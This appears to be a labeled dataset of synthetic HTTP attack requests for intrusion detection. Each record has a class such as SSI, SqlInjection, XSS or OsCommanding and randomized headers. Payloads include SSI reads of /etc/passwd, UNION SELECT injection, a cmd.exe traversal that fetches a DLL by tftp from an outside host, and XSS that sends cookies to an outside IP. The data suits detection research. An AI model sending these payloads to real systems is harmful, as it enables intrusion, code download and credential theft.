Upgrade: he9qat/8.2, oIocas/7.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38457
Start - Id: 39756
class: SSI
GET /tenteIardrnerdioSE1/fg.jpg?5eLocbtearh5=498&zozebu=%3BTahr&Exp_2MLjadminVHJ=lreplace3&Boosps1dc=https&iir=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&itwa4AOaeyao=702406&ra1de=%3EwRep&crlI=fadl2agn%40plink%5Chexetcshutdownson&D80servicesOIg0VT=0684911&Ehon=hlomoeshutdown&Su2ZWY-NC=sNrf&yo=hwfmtml0Dy&4Muo=8kethtecAnjet&HryxPH0B=D%2B%7Cn8&dvuh5psRhg=pdFR8p8 HTTP/1.0
Host: www.nrqR.net:80
Connection: elbkeca
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: p-k;q=0.5, o-eotfk;q=0.1, R0holR7-dtr6;q=0.2, 9eftr-r
Cache-Control: max-stale=52
Client-ip: 122.119.15.78
Cookie: n09wf=c5rseaAnsyo;eebaazha=ftacei2t1raateesli;sfauyceetejn=Eesqi;ptWHJuidy_=55
Cookie2: $Version="098"
Date: Sun, 28 Oct 07 06:51:17 UTC
ETag: W/"Tmpe9G_ANuo1UPM3r"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Tue, 15 Mar 05 16:54:34 CET
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: *
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 0601
MIME-Version: 3.3
Pragma: nmr1eep=nid9
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: lO6Soh rrse=ltmytu8
Range: 85-,34121-
Referer: http://www.ftydado.be/4sbnGAbu/z53rol7/mttn/aplnebt/ninu.cgi
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 2.1; he-e2; rv:1.8.9) Gecko/58178655
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: tiwtae
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39756
Start - Id: 35856
class: XPathInjection
GET /rPlZfco7/z5d-0dq-.lS4/iqcdr3tm2oS/4waZjqcy/oEam/o2YnoNw.l@L6bVmxjSYS/nCfeEbly/7xidOEd/catJ_betweenaccess_logT-.shtml?2ansei=g9QHy050rBT1&VRCwinntQ8aEupdate=Rsr4oortayf8dOwpDi&allmdr0deilw=lgoH%27%5D++%7C++++P+++++%7C++++%2F%2Fuser%5B+++++name%2Ftext%28+++%29+++%3D++%27cans&sfhR2se=cCoQWVch3Dw&srormhcdoe=Racatceo&niswacmgte=s%5Csn&bs611hEiqeRacg=33&Rs9Q_IAPH4O=0orat&ht=552606 HTTP/1.0
Host: 13.63.61.44
Connection: SeaEura
Accept: video/*, application/zip;q=0.2
Accept-Charset: iso-8859-7;q=0.0, x-mac-japanese;q=0.3, windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: tdugi-n, egJosto-Nt
Cache-Control: 0toot='srcns1t'
Client-ip: 166.9.40.74
Cookie: gajha6ot=7rt|v;O9y7whQe=3038;htnhpt3i=tTJy7mJ3;dDh7tcssnji=jdDhu242yT;ae5wcscom=as;2HZwhere5divK20=nDLcSC3
Cookie2: $Version="5"
Date: Fri, 16 Dec 05 11:44:55 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: alcSeiee@shniectns.be
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Fri, 21 Dec 07 24:33:04 CET
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: "nunEqVpqx1i.12QckN7"
If-Range: "i5r.5H0aAAf-6ivyEc"
Max-Forwards: 691
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Basic aXNuZXN1bG86aElpY25PZmk=
Range: -15
Referer: /stnw/redp/utet/Rtowr/m8Qo.js
TE: trailers
Trailer: Range
User-Agent: dLeoihxrrt8rebt
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: FTP/4.0 239.72.167.164:82, HTTP/8.7 www.3asH.css, FTP/7.5 119.223.249.201
Transfer-Encoding: gzip
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35856
Start - Id: 40298
class: SSI
GET /sujxfFUya0P.J/tu/csX.c8G61/wtkvotrezasTjj8a/eHBYJz8Koa7.-/gcKca8nK50k3.4HPuA-K/mrta.cgi?twgd0knQ9lbGna3=tJOGvNkfp1&gneiuhea=273726&c6tbWhcsib=a-rJkkLc&PCexec146a=03128579&eiehi=28&Amea0rXr=%3C%21--++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5C6pue%5Cupg0paAkmw%5CisoeStw.exe+d%3A%5Cbaoentro%5Cwww.onntleni.org%5CcevT3rtr%5Cdatabase.mdb+++++%2Fx+++++exporttofoxpro%22--%3E&mtirreedeou=8&4wjeifeh6oa=rr8r&thtAsagrn=2431&izrrrA8rhhadr=woe&rj1a=4arent6boilsC&ycietltl5nanE=liah&onineSe=d3htotrm&7osda1awSmlto7o=%2F3&-BZautoexecYA=n2anpatnm HTTP/1.1
Host: 72.254.61.49
Connection: close
Accept: application/rtf
Accept-Charset: x-mac-chinesetrad, x-mac-turkish;q=0.3, utf-7;q=0.9, iso-2022-kr
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 191.44.132.121
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="373"
Date: Wed, 18 Aug 04 20:30:44 CET
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: oyte@woinhmes.com
If-Modified-Since: Mon, 02 Mar 09 11:17:47 CET
If-Unmodified-Since: Sun, 12 Nov 06 11:38:36 GMT
If-Match: "mwGYsTcl6A3iql7cLPH"
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 4606
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest response="3f31C46cFe8c67aF5E5a5aF39FC6de6F"
Range: 5046-3165,-1034
Referer: http://lriew.it/lepheIm/ielgrr/klTamk/ajbpso/eistoeos.txt
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (compatible; MSIE 4.1; Linux i386; lhfa)
UA-CPU: MIPS
UA-Disp: 996,846,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40298
Start - Id: 45224
class: PathTransversal
GET /../../? HTTP/1.0
Host: www.soubUth0.de
Connection: close
Accept: text/*;q=0.3
Accept-Charset: cp-950;q=0.3, hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: nvheztn=sHr
Client-ip: 98.132.36.144
Cookie: co2toe1=so
Cookie2: $Version="85"
Date: Wed, 06 Oct 04 01:20:22 UTC
ETag: "-qcabPpgplrjvLIQhRqC"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "XN0oZG0JMiw5tKi5RR_"
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 42
MIME-Version: 3.6
Pragma: ife='toyeU'
Proxy-Authorization: Digest qop=evai40
Authorization: kabmo oerlaete=lrshcet
Range: -01750,762-,10389-0
Referer: http://hil1.fr/ihtioaza/PBeS1nia.cgi
TE: deflate;q=0.2,gzip;q=0.8,trailers
Trailer: Expect
User-Agent: Mozilla/6.9 (X11; U; Open BSD i386 8.3; nr-Eh; rv:5.9.8) Gecko/64826202
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: omOe
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 90.180.246.61
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45224
Start - Id: 42464
class: SqlInjection
GET /fdsdEnent6gagrz9e/l.m/sz8p.gBeTDt@__K/oNU0Y.php4?Bq@QfAAd-N=dAawget&esbeego5siacO=850104&5zWQpb6SJNei=975377&yl2fon=2&eletassqe0Ie=%24lxr%3Caeno%29tAe+mwbn3c&cHsviAnedptraV=twoyGG3CJAAL&rtrhyn9o=68&ar=5197048345&thSenttac=721&Dybs=so2Xht&h5krv=%2Bztffyautoexeca%3Ee&qpllsUy9ricnnqe=m3ne%2Fobgsoundcsogia&hcehraAelto3=%27++++union+++++select++++sum%28dnen%29++from+++SBsnh-- HTTP/1.0
Host: 190.188.216.46
Connection: keep-alive
Accept: video/*, application/zip;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale=1
Client-ip: 88.195.225.227
Cookie: oq7seNzswe=skd6b-xyGO;e2ewaoaOp=0
Cookie2: $Version="3"
Date: Sat, 09 Jan 10 06:29:50 UTC
ETag: W/"x0CGuG3XSClWRc@T"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Thu, 26 Feb 09 09:11:56 GMT
If-Unmodified-Since: Fri, 02 Mar 07 14:31:44 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 30
MIME-Version: 9.0
Pragma: otoepa6='oEDisdE'
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: 7an4e 9cqe4e=chEots
Range: -9
Referer: http://www.sPnse.biz/sq4ao/blwr/uhlnut/zesa.wmn
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Ea6LiEfil9mlw
UA-CPU: 68000
UA-Disp: 910,4080,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: identity
Upgrade: nhii/6.1, lbree/5.0
Warning: 638 134.55.212.85 "ertheexn7ru" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42464
Start - Id: 40854
class: SSI
GET /rPlbZKCLlTIU/mrhnz3t4lSmhqgrersc/l@OqzmyKbgsoundpa.mspx?1Gajpo=%3C%21--++++%23odbc++connect%3D%22ucee%2C7nti8l%2CgdXm%22+++++statement%3D%22select++++*+++++from++flnsh%22--%3E&DSooBJj.Lv=tpydee&Ih1var8WgVrVA=fbsAd&OqO9sehrEn=r3u1&neeeafea1eaoonr=6tira4dogni8aoka&hco=sbundteBnie&elo=254&llI=179581&rAwsotwrlrra=ima&tmr7=98122464&nn=tqdW51 HTTP/1.0
Host: 74.168.198.121:1406
Connection: keep-alive
Accept: video/quicktime;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.6, x-mac-arabic;q=0.8
Accept-Encoding: deflate;q=0.9, compress;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 183.188.60.40
Cookie: tec=nn;zgytAst=re1toi;easr=oii Ey;cihadt7=Pax3ora80r;KcopyQtrcpcO=kq2DwV.
Cookie2: $Version="05"
Date: Thu, 13 Sep 07 07:23:44 UTC
ETag: "tL8-oNOaC9Z8XHTA"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Fri, 16 Jan 09 06:18:28 GMT
If-Match: "rLXOf-sX4kvRuBhhDZ"
If-None-Match: "AMdJCXfSuBH4qsvW2"
If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 8
MIME-Version: 1.5
Pragma: dlecryaf='h3hhsLsa'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: -2294,-0518
Referer: http://ilGi3.uk/unni7ea.pl
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: hhotum7fdi/0.0.4.9
UA-CPU: Sparc
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5993x410
Via: FTP/5.2 132.214.163.210, xaeere/7.6 www.Uzer.shtml, HTTP/3.1 211.85.107.167
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40854
Start - Id: 44416
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: 218.23.215.48
Connection: jf8in
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.0, euc-jp;q=0.8, euc-kr, iso-8859-8, us-ascii;q=0.6
Accept-Encoding: 
Accept-Language: hehC-w2god, ylwN6-p;q=0.9, eu-7wlt
Cache-Control: min-fresh=1814
Client-ip: 211.226.85.152
Cookie: asj9rot=40;b6yzQ=790589;whm=5z;egtc=nsmm
Cookie2: $Version="45"
Date: Fri, 17 Oct 08 03:46:03 CET
ETag: W/"V.NIwSOWHFxujXg-iF_9"
Expect: qeSl8a=erci;preie
From: efawm@cnueo.st
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Thu, 11 Oct 07 15:24:25 CET
If-Match: "T8k8fAp28L8kWHULFD"
If-None-Match: "Ox7366H@R4rKw0BBBa7"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 8706
MIME-Version: 6.2
Pragma: esGSwi=iteHEWe
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: http://www.stqn3d.org/Feunily/rlnee.js
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: n4wrermt0et
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: deflate
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44416
Start - Id: 41617
class: SqlInjection
GET /x@7DUylT_L.aEX8waWMU/1DhnNSilksnaXpb.3VR/YgbtMM.png?3ce7zicnlletle=atsFn3oiineTnn&ecaDh1O=oniRs&6ecnaShoirembcp=Rsrsynullp&ltoenni=hKdvfaV2&eLTEz=cmtwOng%24sozl%7C&L.MY5n=hsef&Y_execqNoEExmlOvar=rtenS&@xfceWQEustyleP4=97800&2cbgo=hlinksrtsiq%25wi&mi04=%27++++%29++UN%2F**%2FION+++ALL+SEL%2F**%2FECT++++%27ual%27%2C4792%2C79%2C%27emsnl%27%2C9+++++FROM++++ge++++WHERE+++++%28++%27%27%3D++++%27&iduo=iEb&EtlsOxhds=rrHFCx_CBa HTTP/1.1
Host: 178.116.140.36
Connection: keep-alive
Accept: audio/basic;q=0.4, application/zip;q=0.8, audio/x-wav;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: S-r1gugoo, ei-nbafnd, ir5u-1e;q=0.5
Cache-Control: max-stale=1869
Client-ip: 224.247.255.87
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Sun, 28 Dec 08 20:08:37 UTC
ETag: "vz5WQdacqFuv82n8"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Mon, 17 Aug 09 22:58:18 CET
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: "h-PoDt8tW8Wn8wuURKH_"
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 5142
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM aGN0Ym1ld2FsamtvcnRpYXNxRWNjc255b2luYU9pRXJl
Authorization: gacor pelAotem=lk8lt
Range: -27,878-
Referer: /tOda/bovttnrf/nswtEDlu/Ueskiew/terr.txt
TE: trailers
Trailer: Host
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 1.1; ro-ic; rv:4.2.8) Gecko/80699922
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/7.8 www.eiuCro.css, HTTP/8.5 www.2iertm.jpeg, 6.4 158.50.218.211
Transfer-Encoding: compress
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 218 www.wr8guiO.js "zuoqfnirh7dgr3ealetn" 
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41617
Start - Id: 47034
class: XSS
GET /astrm/0D/o7rebnoh/yuuH-XQ-.rz3/ocohoee0/gT9QRgp/dkmtepdhaethRDfz/r2hQdzjP1.gif?saisrmfrsyt=%3Cdiv+++++onmouseover+++%3D++++%22+++%5Balert+%28%270mblnmh9ba%27%29%3B%5D+++%22++%3E HTTP/1.0
Host: www.hhS0eek.be:227
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-japanese, x-mac-japanese;q=0.6
Accept-Encoding: 
Accept-Language: heirh-ti, xnseto-unibc1
Cache-Control: max-age=07123
Client-ip: 254.143.45.177
Cookie: dqe0xdsjeiRsiau=2IbhnFE1O
Cookie2: $Version="34"
Date: Sat, 09 Jan 10 12:41:07 CET
ETag: W/"Wv1N7CAcXp.A1d0q"
Expect: tbosO4uw=ourpoii
From: ariNbe@hsyoEoop.ch
If-Modified-Since: Wed, 04 Aug 04 18:38:53 UTC
If-Unmodified-Since: Tue, 06 Mar 07 23:19:30 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: *
Max-Forwards: 68
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: le3Wia ksntt6=tuamnen
Range: 127-39590,86298-2
Referer: /eare.mp3
TE: trailers,gzip;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: tPxmur7 http://www.nqs5n7.gov
UA-CPU: MIPS
UA-Disp: 753,986,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: 8.4 www.aroeiS.html
Transfer-Encoding: gzip
Upgrade: wYxhkr/3.9
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47034
Start - Id: 42858
class: OsCommanding
GET /itqtO8ASrdJ18/%um80@PwLHHTDzla/mofipessse/rSR.w/sd2CrF4SsS5ZfFC-Twp/czlkelh7l1a/sGF0GLT/gehh3L@x/ignIfiht4a/vJEsKyF1.js?deEsTnitl0ispn=%7C+++dir++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&deile1oWd=1373 HTTP/1.0
Host: 150.120.232.75
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: dloruEs-osnot0, ooseoEez-hivscnu8, 6t-RmtE;q=0.9, ah6aetnm-kTrur;q=0.6
Cache-Control: max-age=801
Client-ip: 220.191.86.68
Cookie: hiht=|dacceptnal;hqhttpsSh=q$a;etoot3crh=g8ufIBr
Cookie2: $Version="008"
Date: Sat, 04 Jul 09 21:19:07 CET
ETag: "HnExqP@.ONn5WYu362o"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 19 Sep 07 08:36:11 GMT
If-Unmodified-Since: Thu, 08 Mar 07 08:42:11 UTC
If-Match: *
If-None-Match: "TvWaN9S.m2Nw5gLALYQ8"
If-Range: *
Max-Forwards: 0032
MIME-Version: 4.3
Pragma: sdngem='he'
Proxy-Authorization: njdei gtdN=st7gs
Authorization: NTLM aWkxdW50Q2EwbmVkaWFhaG1laHJ1dGwyd0xyRXRnY2FIYWU=
Range: -865928
Referer: http://www.ehzlnel.st/subf/Ovo7.mdb
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ochh3netog (r_4mwKXnz)
UA-CPU: MIPS
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: gzip
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42858
Start - Id: 45179
class: PathTransversal
GET ////? HTTP/1.1
Host: 190.65.69.213
Connection: nelessp
Accept: audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9, compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 35.207.4.140
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Sat, 06 Sep 08 07:41:32 CET
ETag: W/"Q9YT7f22enb@zJ0p.VT3"
Expect: 100-continue
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Mon, 19 Mar 07 02:45:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7507
MIME-Version: 0.7
Pragma: he='evhsp'
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest nc=9B7EA0Cc
Range: 551-3881,-846
Referer: http://www.aqh4.uk/jpndte/emealh/onpi/oHohw.gif
TE: trailers,chunked,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.6 (compatible; Konqueror/7.8; Unix; ern9nw; yu3detTt)
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1177x8327
Via: yturh/4.5 www.h1deam.tiff, 1.7 30.81.67.141, 4.8 248.91.215.10
Transfer-Encoding: ziit
Upgrade: nohw/6.9, naqr/4.3
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45179
Start - Id: 47587
class: XSS
GET /deRadOI6W_WkJ9U/aiNvLN6eOitStR1/ZyVhavingXQ4hq82/luirbtEacie/sru/rxCSpL6LS./xNZ/yiae.cgi?nlntotEnut=7652&hnenio=en-ZR3K.&aRf3s8sun=%3Cimg+++src+++%3D+++%22+++++esor+++%3E++++%22++onmouseover++%3D+++%22+%5Bwindow.open%28%27http%3A%2F%2F89.255.38.241%2Fetnsge.dll%27%2Bdocument.cookie%29%3B%5D++%22+++%3E&rawnvso=01&3gm9ronlte=453746&XfUllEjsaN=imi HTTP/1.0
Host: www.eaos8Ins.st
Connection: close
Accept: image/png
Accept-Charset: windows-1258, x-mac-chinesesimp, utf-8, iso-8859-4;q=0.3, iso-2022-kr;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 89.98.57.72
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Tue, 03 Nov 09 24:47:03 UTC
ETag: "bZLg6tJkGOeIzov_"
Expect: 100-continue
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 19 Jun 09 01:51:24 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: "NdR7AF0p89vmqDIw"
If-Range: Sun, 18 May 08 22:22:08 CET
Max-Forwards: 8679
MIME-Version: 6.6
Pragma: wdtIulo='ce'
Proxy-Authorization: Digest qop=m2ta
Authorization: Basic dzJob2FjOmVpcmdFbnI=
Range: 849916-
Referer: http://nDaie.be/iighi7.shtml
TE: chunked,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: 1y3aes (nv6dOhO)
UA-CPU: StrongARM
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: 8.0 179.60.33.156:19, HTTP/7.5 www.mJtbne.png:467
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47587
Start - Id: 39830
class: SSI
GET /3MXHBasgNEc/oe40vb/lhdUdnrrssae0zha2/objectMZGgW3evBRWn/JfromHEOK/a.rRC8ThhKrbsBmbN/9gC/_Y3szposition@r-/ifZ8U4-_UmS6@a9myqY/9dBOVl/tzerdsim6s7teeB7ep/nDxge1wGxL71-.php4?UnOo0styles=l+rk&Yws7rqiiM=6de4repe0r&yrej60vodDs=2&-F0XPL0Ca=ttn&deyet=tiwp-si&kwv1OOCrlXxg=%3C%21--+%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&IkjUcw=16688677&rhiEkc=74829056&J4I-JG2amailWf=423351&37ced9eu=at&zw2zpegn3d=s8Grqonmyiie HTTP/1.0
Host: 83.155.181.128
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 82.212.82.14
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Cookie2: $Version="00"
Date: Thu, 31 May 07 08:42:04 GMT
ETag: "63kQDQpII_6GCiFlfNX"
Expect: 100-continue
If-Modified-Since: Sun, 20 Sep 09 13:58:52 UTC
If-Unmodified-Since: Thu, 06 Apr 06 08:11:28 UTC
If-None-Match: "JzlGIhn0gT3lm0Y@l"
Max-Forwards: 23
MIME-Version: 6.3
Pragma: no-cache
Authorization: Basic aWg4YTpkaThuNw==
Referer: /oteis2os/zuoiI/eHnei7s/ltsd.gz
Trailer: Trailer
User-Agent: Mozilla/5.5 (X11; U; Unix 6.7; tq-mh; rv:5.9.0) Gecko/10128164
UA-OS: Mac OS X
UA-Color: color16
Via: 4.1 www.aropr.css
Transfer-Encoding: nsOoSn; iurc5t=prrpae2l
X-Forwarded-For: 158.183.166.134
X-Serial-Number: 46103258544750968619
----: ----------------

null

End - Id: 39830
Start - Id: 37695
class: LdapInjection
PUT /mEeueiaapluc0BcatA92/o4qtu1BjDW/xjzu9xtH4wewkou/passwdw/iO4EOW8q/uaeon/h4dAyseqerghiTh/ywM-jscXkBf19@46V/8rhdmuR/pDki_.jJZz/njjKNI4I/Q1jJu7xT4whereBL.php3? HTTP/1.0
Content-Length: 310
Content-Language: Tl,etjoseab
Content-Encoding: deflate
